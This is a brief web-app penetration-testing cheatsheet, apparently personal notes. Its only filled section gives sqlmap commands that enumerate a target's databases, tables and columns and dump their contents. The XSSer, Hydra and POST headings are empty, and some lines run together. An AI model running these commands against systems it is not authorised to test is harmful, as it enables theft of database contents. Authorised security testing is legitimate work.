Web app pentest
cheatsheet for those tools m not familiar with (sorry m not covering all tools, most of em are easy)
sqlmap
Get request
sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something --dbssqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DATABASE_NAME --tablessqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DB_NAME -T TABLE_NAME --columnssqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DB_NAME -T TABLE_NAME -C col1,col2 --dumpPost request
XSSer
Get request
Post request
Hydra
Last updated